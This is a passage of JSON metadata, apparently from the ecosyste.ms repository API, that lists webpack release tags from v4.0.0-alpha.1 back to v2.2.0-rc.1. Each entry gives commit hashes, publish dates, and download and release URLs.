ub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.1/manifests"},{"name":"v4.0.0-alpha.0","sha":"fd3c8025e5c32e625f68df2b030646a8c2a8467a","kind":"tag","published_at":"2017-12-04T19:52:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.0/manifests"},{"name":"v3.10.0","sha":"c71fd05f98a752753b9450f590c970b76379803d","kind":"tag","published_at":"2017-12-04T18:02:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.10.0/manifests"},{"name":"v3.9.1","sha":"5acbe2f72eaa67654904cf8a127c3ed4da12dc99","kind":"tag","published_at":"2017-11-30T17:10:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.1/manifests"},{"name":"v3.9.0","sha":"73e34a7306d40ed95d666058ad03e9c14de554af","kind":"tag","published_at":"2017-11-30T13:53:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.0/manifests"},{"name":"v3.8.1","sha":"b8e6b4a100a5d5a6387c276eb52d6c7f20954a0b","kind":"tag","published_at":"2017-10-17T15:20:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.1/manifests"},{"name":"v3.8.0","sha":"1dc561865ad57d9e862832ccf3579f67a8bbba2d","kind":"tag","published_at":"2017-10-17T09:15:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.0/manifests"},{"name":"v3.7.1","sha":"ce24e98bc084bf45a271fb05b14b0e9829686149","kind":"tag","published_at":"2017-10-11T19:39:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.7.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.1/manifests"},{"name":"v3.7.0","sha":"551ea76838f163a1e0fbf65182e2ac08d346a1f3","kind":"tag","published_at":"2017-10-11T18:07:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.0/manifests"},{"name":"v3.6.0","sha":"622675993d72c6ea7d70cd2e503fd9416f940b2b","kind":"tag","published_at":"2017-09-15T08:45:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.6.0/manifests"},{"name":"v3.5.6","sha":"92d5c209437f9ef9293571e24cc8dcf10459d578","kind":"tag","published_at":"2017-09-06T15:41:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.6","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.6/manifests"},{"name":"v3.5.5","sha":"ef6ab6820a74db730cfec6fd419d2c211d62c0bd","kind":"tag","published_at":"2017-08-16T14:55:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.5","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.5/manifests"},{"name":"v3.5.4","sha":"990563f9a2b3fb3e817b7e1b9d6841bcd1eaa51e","kind":"tag","published_at":"2017-08-12T09:16:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.4","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.4/manifests"},{"name":"v3.5.3","sha":"4b2b1ad99b86458983714c589c6495772b1292ee","kind":"tag","published_at":"2017-08-10T13:38:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.3","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.3/manifests"},{"name":"v3.5.2","sha":"25302e51a601b4e30a661d788471e4a50b7a9764","kind":"tag","published_at":"2017-08-09T10:51:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.2","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.2/manifests"},{"name":"v3.5.1","sha":"5be959311a746b976a0a56625cc4372307b351ed","kind":"tag","published_at":"2017-08-08T11:26:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.1/manifests"},{"name":"v3.5.0","sha":"75a8ffec0a8ab2f1f07a950ee965a31917af5fe9","kind":"tag","published_at":"2017-08-08T08:50:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.0/manifests"},{"name":"v3.4.1","sha":"1f064bc84f222305afada087f9631fd7ae39ea30","kind":"tag","published_at":"2017-07-26T08:48:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.1/manifests"},{"name":"v3.4.0","sha":"c8732c8d157ed56542d521a557dda7ff7ad12ffb","kind":"tag","published_at":"2017-07-25T14:27:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.0/manifests"},{"name":"v3.3.0","sha":"5b119e7c5b437fd48e7e681996b9be10cbd6de34","kind":"tag","published_at":"2017-07-15T13:52:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.3.0/manifests"},{"name":"v2.7.0","sha":"eeea490e8ec0e2341cd4bb6da82aabf6ca139322","kind":"tag","published_at":"2017-07-12T07:00:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.7.0/manifests"},{"name":"v3.2.0","sha":"d0059901266e54a22309c419cad6d9327767c5a3","kind":"tag","published_at":"2017-07-11T20:09:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.2.0/manifests"},{"name":"v3.1.0","sha":"4bb3018da4310deaeff52b8a1c2b5645282b9994","kind":"tag","published_at":"2017-07-06T21:57:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.1.0/manifests"},{"name":"v3.0.0","sha":"bf4ec9c26e8f6de76c3d3ec1371f3ca1c8999ca5","kind":"tag","published_at":"2017-06-19T15:37:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0/manifests"},{"name":"v3.0.0-rc.2","sha":"2ba04991056475509a4e45599a1f42e91cce6233","kind":"tag","published_at":"2017-06-14T21:46:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.2/manifests"},{"name":"v3.0.0-rc.1","sha":"2e8b77ddcf66867b208dffce97fb94a87be48369","kind":"tag","published_at":"2017-06-07T11:33:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.1/manifests"},{"name":"v3.0.0-rc.0","sha":"3d653290fafe385277b48e5a36807124618b9561","kind":"tag","published_at":"2017-06-05T14:12:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.0/manifests"},{"name":"v2.6.1","sha":"7cfd2c490ea96c9676e8de54f2e7b6d1214722da","kind":"tag","published_at":"2017-05-25T11:16:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.6.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"af05c147f24d3e7ee62e0c4102bb32c55e73b8d7","kind":"tag","published_at":"2017-05-22T20:38:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.0/manifests"},{"name":"v2.5.1","sha":"ad2f68f1f21602750ad891ea89a926806acbc95f","kind":"tag","published_at":"2017-05-06T20:07:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"bf3652b16b65c27db5243aa0d674e2de4a8ccde9","kind":"tag","published_at":"2017-05-04T10:17:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.0/manifests"},{"name":"v2.4.1","sha":"bd753567da1248624beaaea14af31d6dbe303411","kind":"tag","published_at":"2017-04-14T13:34:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"0cbd8fd1a05ee401b5feb95ba2b8edae31571d94","kind":"tag","published_at":"2017-04-14T11:42:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.0/manifests"},{"name":"v1.15.0","sha":"d4878a55be7a4b7ac4e5db1ae5eef89e15811072","kind":"tag","published_at":"2017-04-13T10:18:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.15.0/manifests"},{"name":"v2.3.3","sha":"ba24c1b163dc038ed738eb4a57dcb241bf63146d","kind":"tag","published_at":"2017-04-03T07:49:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"6b209b13d76ec43080d6afbad4bb4dd6931e4638","kind":"tag","published_at":"2017-03-25T00:02:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.2/manifests"},{"name":"v2.3.1","sha":"4b9b660e8c4fe8ab6425014cb24dcec2d5df194b","kind":"tag","published_at":"2017-03-22T14:40:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"46dc08e6317170a56df6c34adc8133dd6f70f1fa","kind":"tag","published_at":"2017-03-21T22:43:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.0/manifests"},{"name":"v2.2.1","sha":"0445b156d2c958536b72036e68ca6bde0ad32055","kind":"tag","published_at":"2017-01-30T21:13:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"4be093d27942c25ec802a40268ed94e24d886b1d","kind":"tag","published_at":"2017-01-17T19:14:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0/manifests"},{"name":"v2.2.0-rc.8","sha":"227846990cbc1a406bb61c5e6cafb3f3f38c8cdd","kind":"tag","published_at":"2017-01-17T18:46:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.8","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.8/manifests"},{"name":"v2.2.0-rc.7","sha":"0b476022bbbddb206432e20b9c8bc5e91e592202","kind":"tag","published_at":"2017-01-16T15:01:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.7","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.7/manifests"},{"name":"v2.2.0-rc.6","sha":"97966969b0c9e8425ecb1238deea979c6a18cb27","kind":"tag","published_at":"2017-01-16T02:48:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.6","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.6/manifests"},{"name":"v2.2.0-rc.5","sha":"437dce4c8684f4295b5bb68a6ea5662c2660d780","kind":"tag","published_at":"2017-01-15T16:23:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.5","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.5/manifests"},{"name":"v2.2.0-rc.4","sha":"f745f02910cb45a55ed659ebd99288e45a38e873","kind":"tag","published_at":"2017-01-11T15:42:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.4","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.4/manifests"},{"name":"v2.2.0-rc.3","sha":"92a8be23614f92bc5669bf43eb0ddf746b2477e7","kind":"tag","published_at":"2016-12-28T15:03:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.3/manifests"},{"name":"v2.2.0-rc.2","sha":"8369cc4c03767d7a76d1f7a047d11e71a550ddae","kind":"tag","published_at":"2016-12-22T10:51:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.2/manifests"},{"name":"v2.2.0-rc.1","sha":"27e604e23100274a8887a5acf0008376d2617071","kind":"tag","published_at":"2016-12-17T08:09:32.000Z","download_url":"h